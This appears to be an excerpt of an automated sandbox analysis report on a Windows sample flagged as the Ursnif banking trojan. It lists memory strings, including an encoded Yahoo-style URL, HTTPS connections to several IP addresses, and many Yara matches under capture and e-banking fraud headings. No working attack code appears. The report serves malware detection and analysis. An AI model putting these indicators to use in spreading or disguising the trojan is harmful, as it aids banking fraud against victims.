                      Source: FpYf5EGDO9.exe, 00000000.00000003.450513651.0000000002240000.00000004.00000001.sdmpString found in binary or memory: var u='https://www.yahoo.com/?err=404&err_url=https%3a%2f%2fwww.yahoo.com%2fj equals www.yahoo.com (Yahoo)
                      Source: FpYf5EGDO9.exe, 00000000.00000003.351373141.0000000002246000.00000004.00000001.sdmpString found in binary or memory: var u='https://www.yahoo.com/?err=404&err_url=https%3a%2f%2fwww.yahoo.com%2fjdraw%2fHHAQ457B0GtLskLkv%2fZizh9TthhcPc%2fxT0iS3Qjl7y%2fkpH0MqC4dszB3H%2fHWmjHuRTfALKqcqKHLe5h%2f5KAnfOS4i_2BLVi7%2f2L64u5xwvTf3sXp%2fUrLoeHhSH12GKB9jsQ%2f3izuuqgp_%2f2BeydbeuNgrndFBMAfCQ%2fMxSWsDqksAzA_2F87xp%2fN1In9Bv1C1YQS1KkwHJ10H%2fTNNv.crw'; equals www.yahoo.com (Yahoo)
                      Source: FpYf5EGDO9.exe, 00000000.00000003.450513651.0000000002240000.00000004.00000001.sdmpString found in binary or memory: www.yahoo.com equals www.yahoo.com (Yahoo)
                      Source: FpYf5EGDO9.exe, 00000000.00000003.351373141.0000000002246000.00000004.00000001.sdmpString found in binary or memory: www.yahoo.com/jdraw/HHAQ457B0GtLskLkv/Zizh9TthhcPc/xT0iS3Qjl7y/kpH0MqC4dszB3H/HWmjHuRTfALKqcqKHLe5h/5KAnfOS4i_2BLVi7/2L64u5xwvTf3sXp/UrLoeHhSH12GKB9jsQ/3izuuqgp_/2BeydbeuNgrndFBMAfCQ/MxSWsDqksAzA_2F87xp/N1In9Bv1C1YQS1KkwHJ10H/TNNv.crw equals www.yahoo.com (Yahoo)
                      Source: FpYf5EGDO9.exe, 00000000.00000003.351373141.0000000002246000.00000004.00000001.sdmpString found in binary or memory: www.yahoo.com7 equals www.yahoo.com (Yahoo)
                      Source: FpYf5EGDO9.exe, 00000000.00000003.450513651.0000000002240000.00000004.00000001.sdmpString found in binary or memory: www.yahoo.comB equals www.yahoo.com (Yahoo)
                      Source: FpYf5EGDO9.exe, 00000000.00000003.450513651.0000000002240000.00000004.00000001.sdmpString found in binary or memory: www.yahoo.comE equals www.yahoo.com (Yahoo)
                      Source: FpYf5EGDO9.exe, 00000000.00000003.351373141.0000000002246000.00000004.00000001.sdmpString found in binary or memory: www.yahoo.comZ equals www.yahoo.com (Yahoo)
                      Source: FpYf5EGDO9.exe, 00000000.00000003.351373141.0000000002246000.00000004.00000001.sdmpString found in binary or memory: www.yahoo.comows\system32\jsproxy.dll equals www.yahoo.com (Yahoo)
                      Source: FpYf5EGDO9.exe, 00000000.00000003.450513651.0000000002240000.00000004.00000001.sdmpString found in binary or memory: www.yahoo.comzD( equals www.yahoo.com (Yahoo)
                      Source: FpYf5EGDO9.exe, 00000000.00000002.510275033.00000000021CA000.00000004.00000001.sdmpString found in binary or memory: www.yahoo.com{ equals www.yahoo.com (Yahoo)
                      Source: unknownHTTPS traffic detected: 74.6.143.26:443 -> 192.168.2.3:49747 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 87.248.100.216:443 -> 192.168.2.3:49748 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 89.44.9.140:443 -> 192.168.2.3:49751 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 209.202.254.90:443 -> 192.168.2.3:49817 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 209.202.254.90:443 -> 192.168.2.3:49818 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 87.248.118.22:443 -> 192.168.2.3:49820 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 212.82.100.140:443 -> 192.168.2.3:49821 version: TLS 1.2

                      Key, Mouse, Clipboard, Microphone and Screen Capturing:

                      barindex
                      Yara detected UrsnifShow sources
                      Source: Yara matchFile source: 0000000E.00000003.484252773.000001A99926C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002C.00000003.696288190.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002C.00000002.698116221.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000002.820256805.0000027741E02000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000024.00000002.823251492.000001EAE4A02000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002C.00000003.696063794.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.397698170.00000000046FC000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002C.00000003.696408888.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001F.00000003.539185713.000001B88940C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001E.00000002.826107639.000001B91FF02000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.351603382.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002C.00000003.696253842.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001F.00000003.539264556.000001B88940C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000015.00000003.463766511.00000227E5BFC000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001F.00000002.540966391.000001B88940C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.397157084.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.351549542.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.449933365.0000000005C38000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.351505235.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000015.00000002.542615243.00000227E5BFC000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000015.00000003.531429519.00000227E5BFC000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000023.00000002.829961859.00000163C5A02000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002C.00000003.696348362.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002C.00000003.696117374.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000015.00000003.463832492.00000227E5BFC000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.351619714.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002C.00000003.696320291.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002C.00000003.696213478.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.396094392.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.351527418.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.351580737.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002C.00000003.696160386.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.351432716.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.351478648.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: FpYf5EGDO9.exe PID: 5556, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 4856, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: control.exe PID: 2904, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 4084, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6080, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 4176, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 4440, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 4544, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: cmd.exe PID: 6088, type: MEMORYSTR
                      Source: Yara matchFile source: 0.3.FpYf5EGDO9.exe.43394a0.11.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.FpYf5EGDO9.exe.48794a0.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.FpYf5EGDO9.exe.47fa4a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.FpYf5EGDO9.exe.47fa4a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.FpYf5EGDO9.exe.3c40000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.FpYf5EGDO9.exe.43394a0.11.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.FpYf5EGDO9.exe.48a4ef8.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000001F.00000000.537482070.000001B888D00000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000024.00000000.646320070.000001EAE4570000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001F.00000000.536149519.000001B888D00000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000023.00000000.614869233.00000163C5170000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000024.00000000.638980317.000001EAE4570000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000015.00000000.461568150.0000000000A30000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000000.658606689.0000027741BA0000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.511067245.0000000004500000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001E.00000000.564696264.000001B920020000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.592498182.000001A99050B000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000024.00000000.642623861.000001EAE4570000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001E.00000000.557126032.000001B920020000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.508974340.0000000004339000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001E.00000000.569957507.000001B920020000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000015.00000000.462780080.0000000000A30000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001F.00000000.534786772.000001B888D00000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000000.660520120.0000027741BA0000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.397014247.00000000047FA000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.397054517.0000000004879000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000023.00000000.601911502.00000163C5170000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000000.656936601.0000027741BA0000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000015.00000000.459559350.0000000000A30000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000023.00000000.608382094.00000163C5170000.00000040.00020000.sdmp, type: MEMORY
                      Source: FpYf5EGDO9.exe, 00000000.00000002.510175221.00000000021AA000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                      E-Banking Fraud:

                      barindex
                      Yara detected UrsnifShow sources
                      Source: Yara matchFile source: 0000000E.00000003.484252773.000001A99926C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002C.00000003.696288190.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002C.00000002.698116221.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000002.820256805.0000027741E02000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000024.00000002.823251492.000001EAE4A02000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002C.00000003.696063794.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.397698170.00000000046FC000.00000004.00000040.sdmp, type: MEMORY